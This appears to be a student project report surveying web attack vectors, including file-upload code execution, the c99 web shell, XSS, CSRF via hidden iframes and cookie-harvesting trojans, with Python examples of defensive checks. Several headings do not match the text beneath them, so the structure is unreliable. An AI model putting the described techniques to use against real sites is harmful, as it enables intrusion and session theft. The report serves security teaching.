example, a novice user may open an e-mail attachment that
contains a virus, and almost everyone can be persuaded at least
once in their life to reveal a password for some seemingly relevant
reason.
Payload
On the Internet, a payload is either: The essential data that is
being carried within a packet or other transmission unit.
Instead of hard coding the payload in the exploit code, set the
payload option in the setg (set global) and then run the save
command. You can develop your module without configuring the
payload again and again. Of course, if you need a separate
payload for any other module, just set it like normally using the
set command and it will override the global one. This is more
flexible than hard coding the payload within the exploit code.
Creating a Payload
Return-oriented programming is an advanced version of a stack
smashing attack. Generally, these types of attacks arise when an
adversary manipulates the call stack by taking advantage of a bug
in the program, often a buffer overrun. In a buffer overrun, a
function that does not perform proper bounds checking before
storing user-provided data into memory will accept more input
data than it can store properly. If the data is being written onto the
stack, the excess data may overflow the space allocated to the
function's variables (e.g., "locals" in the stack diagram to the
right) and overwrite the return address. This address will later be
used by the function to redirect control flow back to the caller. If it
has been overwritten, control flow will be diverted to the location
specified by the new return address. In a standard buffer overrun
attack, the attacker would simply write attack code (the
"payload") onto the stack and then overwrite the return address
with the location of these newly written instructions.
Execute the Payload
A remote authenticated user can execute arbitrary code on the
target system. A remote authenticated user with editor privileges
can upload PHP files containing arbitrary code, which can then be
executed with the privilege of the web service. The vulnerability
resides in the file upload component and the File Abstraction
Layer.
Connecting the Payload Back to the Machine
More recent PHP versions have register_globals set to off by
default; however some users will change the default setting for
applications that require it. This register can be set to "on" or "off"
either in a php.ini file or in a .htaccess file. The variable should be
properly initialized if this register is set to "on." Administrators
who are unsure should question application developers who insist
on using register_globals. It is an absolute must to sanitize all user
input before processing it. As far as possible, avoid using shell
commands. However, if they are required, ensure that only filtered
data is used to construct the string to be executed and make sure
to escape the output.
C99.php Compare and Contrast
In many ways it can be considered the web equivalent of the
rootkits that successful attackers often download. In other ways it
is the malware equivalent of PHPShell itself. c99 is often one of the
utility programs that is either downloaded if a web server is
vulnerable due to being misconfigured, or can be used in a remote
file include attack to try and execute shell commands on a
vulnerable server.
C99.php Malicious Functionality
The c99 PHP utility provides functionality for listing files, brute-forcing FTP passwords, updating itself, executing shell commands
and PHP code. It also provides for connecting to MySQL databases,
and initiating a connect-back shell session.
Mutillidae Example
The File Upload flaw allows a remote user to upload arbitrary files and execute
arbitrary code on the target system.

Counter Measure
Do not rely on user inputs: use hash tables, white-list filters,
escape commands, validate file type and format, run AV on
uploaded files, and segregate uploads.
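The white-list, type-format and segregation checks from the counter measure list, written out as an added example (not the project's code); the upload directory path and the set of permitted image types are assumptions.

```python
import secrets
from pathlib import Path

# White-list of permitted extensions and the magic bytes each must start with
# (assumption: the application only needs to accept images).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 5 * 1024 * 1024

# Assumption: a directory outside the web root, served as static data only,
# so nothing stored here is ever handed to the PHP interpreter (segregation).
UPLOAD_DIR = Path("/srv/uploads_noexec")


def validate_upload(filename: str, data: bytes) -> str:
    """Apply the checks and return the server-chosen storage name, or raise."""
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    ext = Path(filename).suffix.lower().lstrip(".")   # last extension only
    if ext not in MAGIC:                               # white-list, not black-list
        raise ValueError(f"extension {ext!r} is not permitted")
    if not data.startswith(MAGIC[ext]):                # declared type vs content
        raise ValueError("content does not match the declared file type")
    # A polyglot (valid image header followed by PHP) passes the magic check,
    # which is why the stored name is server-chosen with a white-listed
    # extension and the directory never executes scripts. Never reuse the
    # client's name: it may carry path or double-extension tricks.
    return f"{secrets.token_hex(16)}.{ext}"


def upload_allowed(filename: str, data: bytes) -> bool:
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        validate_upload(filename, data)
        return True
    except ValueError:
        return False


def save_upload(filename: str, data: bytes, upload_dir: Path = UPLOAD_DIR) -> Path:
    """Validate, then write under the segregated directory; returns the path."""
    stored = upload_dir / validate_upload(filename, data)
    upload_dir.mkdir(parents=True, exist_ok=True)
    stored.write_bytes(data)
    return stored
```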

Attack Vector
Cross Site Scripting
Cross Site Scripting
A form of attack against web applications is called Cross Site
Scripting, also known as XSS. In a cross-site scripting attack, data
is entered into an application which is later written back to
another user. If the application has not taken care to validate the
data correctly, it may simply echo the input back allowing the
insertion of JavaScript code into the HTML page.
Reflective Cross Site Scripting
In a reflected cross site scripting attack, the attack is in the request
itself (frequently the URL) and the vulnerability occurs when the
server inserts the attack in the response verbatim or incorrectly
escaped or sanitized. The victim triggers the attack by browsing to
a malicious URL created by the attacker.
Persistent Cross Site Scripting
A persistent cross-site scripting vulnerability arises when the attacker
provides malicious data to the web application and it is stored
permanently in a database or some other similar storage. The
malicious data is later accessed and executed by the victims
without it being filtered or sanitized. This variant of cross-site
scripting vulnerability has the largest impact of all when compared
to other XSS.
Testing if a webpage is vulnerable to Cross Site Scripting
The first step in this process is to get your toolkit in order (Web
proxies for manual testing). You're going to need to intercept the
HTTP requests your Web browser makes before they get sent, and
then modify them to inject your XSS test. Intercepting the client
GET and POST requests is extremely important. This will let you
bypass any sort of client-side JavaScript input validation code that
may have been pushed down. Map out the site and its
functionality by creating some simple data flow diagrams that
describe the pages on the site and their purposes. List out all of
the query string parameters, cookie values, custom HTTP headers,
POST data values, and other forms of user-supplied input passed.
Look at the HTML output and find where your input made it in.
Using an iframe to point to a malicious website
A malicious site can use an iframe to exploit a vulnerable site via
CSRF. In a typical CSRF attack, the browser is tricked by a
malicious site to submit a request to a vulnerable site. The
browser will include the cookies for that site, thus the request is
authenticated from the point of view of the vulnerable site. While
there are a number of ways to trigger a GET request, cross-site POST
requests are usually created by submitting a form. While JavaScript
can be used to trigger the submission automatically, it cannot be
used to hide the result page, so in a simple POST-based CSRF attack
the user will be warned after the fact. The trick is to put the
malicious auto-submitting form into an invisible iframe. Therefore
the user will not see the webpage showing the submission result.
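The server-side check that defeats the hidden-iframe form just described, as an added example rather than the project's code: the browser attaches the victim's cookies automatically, so the request must also carry a per-session token the framing site cannot read. The site origin and the dict-shaped session, form and headers are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the protected site's own origin; a form auto-submitted from a
# framing site cannot make the browser send this value in Origin.
SITE_ORIGIN = "https://app.example"


def issue_csrf_token(session: dict) -> str:
    """Generate a per-session secret; the app embeds it as a hidden form field."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _same_origin(url: str) -> bool:
    parts = urlsplit(url)
    site = urlsplit(SITE_ORIGIN)
    return (parts.scheme, parts.netloc) == (site.scheme, site.netloc)


def state_changing_request_allowed(session: dict, form: dict, headers: dict) -> bool:
    """Decide whether a POST may proceed. Cookies alone prove nothing here,
    because the browser added them to the cross-site request on its own."""
    # 1. Browsers set Origin on cross-site POSTs; a foreign value is rejected
    #    (Referer is consulted as a fallback, compared by scheme and host).
    origin = headers.get("Origin") or headers.get("Referer")
    if origin and not _same_origin(origin):
        return False
    # 2. Synchronizer token: the value in the form must equal the session's
    #    copy; compared in constant time, as bytes, so odd input cannot raise.
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected:
        return False
    return hmac.compare_digest(supplied.encode(), expected.encode())
```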
Planting a cookie harvester into a blog to gain a victim's
cookie information
An attacker can release a Trojan in order to gain control over a
computer. This Trojan's payload consists of dropping a Backdoor
(to open a port), changing the homepage of the browser and
placing a malicious cookie in the browser's cookie area. When
the unsuspecting user launches the browser, it automatically
connects to the new homepage (namely the attacker's website).
Once this is done, the malicious cookie is read and the
attacker becomes aware of the fact that the computer is infected.
Knowing this, it becomes a piece of cake to take over the
computer using some exploits or the open port.
Mutillidae Example
Persistent Cross Site Scripting Injection
Man-in-the-middle and Persistent Covert Cross Site Scripting
Injection
Persistent Covert Cross Site Scripting Injection with Metasploit

Counter Measure
The best counter measure approach is always to probe for
vulnerabilities, run intrusion detection systems, and block attacks
using firewalls. The simplest form of XSS protection is to pass all
external data through a filter.
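The filter the counter measure calls for, applied to the reflected and persistent cases described in this section, as an added example that is not the project's code: stored comments are entity-encoded before being written back, attribute values have their quotes encoded, and link targets are restricted to http/https because encoding alone does not neutralise a javascript: URL. The sample comments are constructed.

```python
import html
from urllib.parse import urlsplit

# Constructed sample: comments as a blog would store them (the persistent
# case); the second and third are harmless markers standing in for payloads.
STORED_COMMENTS = [
    "Great write-up, thanks!",
    "<script>alert(1)</script>",
    '" onmouseover="alert(1)',
]


def render_vulnerable(comments) -> str:
    """Echoes stored data straight into the page: the weak pattern."""
    return "".join(f"<p>{c}</p>" for c in comments)


def render_safe(comments) -> str:
    """The filter: every external value is HTML-entity encoded before it is
    written into element content, so '<' can never open a tag."""
    return "".join(f"<p>{html.escape(c, quote=True)}</p>" for c in comments)


def attribute_safe(value: str) -> str:
    """Attribute context needs quotes encoded too, or the value closes the
    attribute and adds its own (the third sample comment tries exactly that)."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def safe_href(url: str) -> str:
    """URL context: only http/https or a same-site relative path is allowed
    through; javascript: and protocol-relative targets become '#'."""
    url = url.strip()
    scheme = urlsplit(url).scheme.lower()
    if scheme in ("http", "https"):
        return html.escape(url, quote=True)
    if scheme == "" and url.startswith("/") and not url.startswith("//"):
        return html.escape(url, quote=True)
    return "#"


def contains_live_markup(rendered: str) -> bool:
    """Crude detection check: does a script tag or an unencoded event-handler
    attribute survive in the rendered output?"""
    lowered = rendered.lower()
    return "<script" in lowered or 'onmouseover="' in lowered
```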

Conclusion
The Future of Attack Vectors and Going Forward Counter
Measures
Cybercriminals tend to focus where the weak spots are and use a
technique until it becomes less effective, and then move on to the
next frontier. Protecting data in a world where systems are
changing rapidly, and information flows freely, requires a
coordinated ecosystem of security technologies. Going forward,
counter measures must focus on all the key components:
enforcement of use policies, data encryption, secure access to
corporate networks, productivity and content filtering,
vulnerability and patch management, and of course threat and
malware protection.
JavaScript and CGI input validation
When you submit a form to a CGI program that resides on the
server, it is usually programmed to do its own check for errors. If it
finds any, it sends the page back to the reader, who then has to re-enter
some data before submitting again. A JavaScript check is
useful because it stops the form from being submitted if there is a
problem, saving lots of time for your readers.
The CGI script is still more reliable, as it always works regardless
of whether JavaScript is enabled on the client-side or not; but
having this extra safety barrier is a nice thing to have in place. It
makes your page much more user-friendly, and takes out the
frustration of having to fill out the same form repeatedly. It's also
very precise, as you can point out the exact field where there's a
problem.
Ongoing Security Testing
Networks are required to be safe, interconnected, and constantly
available in order to conduct business in our global economy.
Without regular vulnerability audits and management, network
infrastructure can introduce significant risks to an organization
and managing the risk associated with ever-changing business-critical systems is becoming increasingly challenging.

PROJECT MEMBERS
PROJECT MANAGER
Cyuba Thomas
DeMarc Gradney
Nathan Green
Preston Mendez
Maurice Smith